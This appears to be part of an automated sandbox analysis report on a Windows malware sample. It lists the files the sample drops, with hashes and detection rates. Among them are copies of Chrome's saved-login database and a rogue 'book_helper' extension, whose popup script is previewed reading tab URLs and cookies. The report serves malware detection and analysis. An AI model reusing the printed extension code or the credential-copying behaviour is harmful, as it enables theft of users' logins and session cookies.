                                                                                                                                                                        Entropy (8bit):5.292996107428883
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                                        MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                                        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                                        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                                        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2380
                                                                                                                                                                        Entropy (8bit):5.687293760500434
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                                        MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                                        SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                                        SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                                        SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                        Entropy (8bit):5.048307538221611
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                                        MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                                        SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                                        SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                                        SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):642
                                                                                                                                                                        Entropy (8bit):4.985939227199713
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                                        MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                                        SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                                        SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                                        SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5468
                                                                                                                                                                        Entropy (8bit):5.178424878725887
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:nq6CbKM/XwdV8zsVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVFy4K7
                                                                                                                                                                        MD5:E52AE16D8295111F41CE1017D6BBD717
                                                                                                                                                                        SHA1:13B9B7EB0D9803835987D908F328C5D2A67EFDCD
                                                                                                                                                                        SHA-256:B3F3400CE3E6F70DC2C916F71D3079799D8BCDA3F2321658091720CC0371A630
                                                                                                                                                                        SHA-512:F56A537EF5C61B285EB70847DCF3F1DD36E7BBB1A74419F51332BA99DCBA3992E89E6BCA69E61676668D26A7E2D47CE0FA2DFD19021DEB5451BA5417BB659D55
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: UTF-8 Unicode text, with very long lines
Category: dropped
Size (bytes): 34636
Entropy (8bit): 5.537941123959356
Encrypted: false
SSDEEP: 768:gEyODNUckPWmr+VqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnih9e:R5OLlvAnt
MD5: A8880AA0B82D2CAA5A706D133ACD3070
SHA1: 92AC70E91495CCEBB080E1EDB657BFD0E810AC09
SHA-256: DC1465579AB0AF761868D09122E283E44FBF2EFF167977C1A1BE71870C9542D0
SHA-512: 35E15BC84290D122286DE1404345FF9A5A2D55AF6B039B6F624C932B15CE7A3EABD4E5181810223744A0F320225DDF2D266C72916B74FACC6340ADB5FCB16679
Malicious: true
Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
C:\Users\user\AppData\Local\Login Data1612045889505
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
C:\Users\user\AppData\Local\Login Data1612045902661
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
C:\Users\user\AppData\Local\Temp\1612045891739
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: 7-zip archive data, version 0.3
Category: dropped
Size (bytes): 37737
Entropy (8bit): 7.994967159065528
Encrypted: true
SSDEEP: 768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5: 5A6469A3F787ABD2AE93B47470528F79
SHA1: 4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256: 1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512: 335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious: false
C:\Users\user\AppData\Local\Temp\1612045892739
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: 7-zip archive data, version 0.3
Category: dropped
Size (bytes): 553040
Entropy (8bit): 7.999671101282436
Encrypted: true
SSDEEP: 12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5: A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1: 158501079514868D85246E970314A024FF263199
SHA-256: 18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512: 334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious: false
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Process: C:\Users\user\Desktop\fnhcdXEfus.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4453376
Entropy (8bit): 7.745694560857276
Encrypted: false
SSDEEP: 98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
MD5: 18169F98E39AE228D131AEC477C8A2E9
SHA1: C6C6EACAA8DF6EA5251C7F26A2D9EC4317092E6A
SHA-256: 344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
SHA-512: 8DEACA50E918252BA85715C85096E810733A9512C656FA40AD71E22437CC8F74D1965468592929A4B1216D33DA598C308B312F5C1AA770F62959C873A4582EFB
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 35%
• Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:
• Filename: fnhcdXEfus.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe:Zone.Identifier
Process: C:\Users\user\Desktop\fnhcdXEfus.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 5.2861874904617645
Encrypted: false
SSDEEP: 96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5: 84878B1A26F8544BDA4E069320AD8E7D
SHA1: 51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256: 809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512: 4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 6MhmlD8KZh.exe, Detection: malicious
• Filename: fnhcdXEfus.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):268744
Entropy (8bit):5.398284390686728
Encrypted:false
SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:E2E9483568DC53F68BE0B80C34FE27FB
SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 8%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: fnhcdXEfus.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):73160
Entropy (8bit):6.49500452335621
Encrypted:false
SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:F0372FF8A6148498B19E04203DBB9E69
SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 2%
C:\Users\user\AppData\Local\Temp\download\atl71.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):89600
Entropy (8bit):6.46929682960805
Encrypted:false
SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):92080
Entropy (8bit):5.923150781730819
Encrypted:false
SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:DBA9A19752B52943A0850A7E19AC600A
SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3512776
Entropy (8bit):6.514740710935125
Encrypted:false
SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:1A87FF238DF9EA26E76B56F34E18402C
SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):503808
Entropy (8bit):6.4043708480235715
Encrypted:false
SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:A94DC60A90EFD7A35C36D971E3EE7470
SHA1:F936F612BC779E4BA067F77514B68C329180A380
SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):348160
Entropy (8bit):6.56488891304105
Encrypted:false
SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59904
Entropy (8bit):6.753320551944624
Encrypted:false
SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:89F6488524EAA3E5A66C5F34F3B92405
SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\ecvB803.tmp
Process:C:\Users\user\AppData\Roaming\1612045890161.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb2e8beb6, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):1.0164576350128136
Encrypted:false
SSDEEP:24576:wEwqTaoxujmVezmgxeCAGiSoB0yLKgSFDb7uBi:GmVezxerk
MD5:4D015B11306E72A07B0F37934ABF3A16
SHA1:288A561B9346A93F4BF13ABEA91A5B4097D27504
SHA-256:DB4D8315572F112B0A7AA20F26A779A10613D81C11C6646810F369AFBBC17C44
SHA-512:E406B63B2E3FDC4BB666EF3E26F092E16D54DD155142E1524828DCFD13251CB312B785AFD97172A75227A6377057E6348889A443AA4D7706C0EAE60436201FD3
Malicious:false
C:\Users\user\AppData\Local\Temp\gdiview.msi
Process:C:\Users\user\Desktop\fnhcdXEfus.exe
File Type:;1033
Category:modified
Size (bytes):237056
Entropy (8bit):6.262405449836627
Encrypted:false
SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:false
C:\Users\user\AppData\Local\Temp\xldl.dat
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:7-zip archive data, version 0.3
Category:dropped
Size (bytes):1397922
Entropy (8bit):7.999863097294012
Encrypted:true
SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:false
C:\Users\user\AppData\Local\Temp\xldl.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):293320
Entropy (8bit):6.347427939821131
Encrypted:false
SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
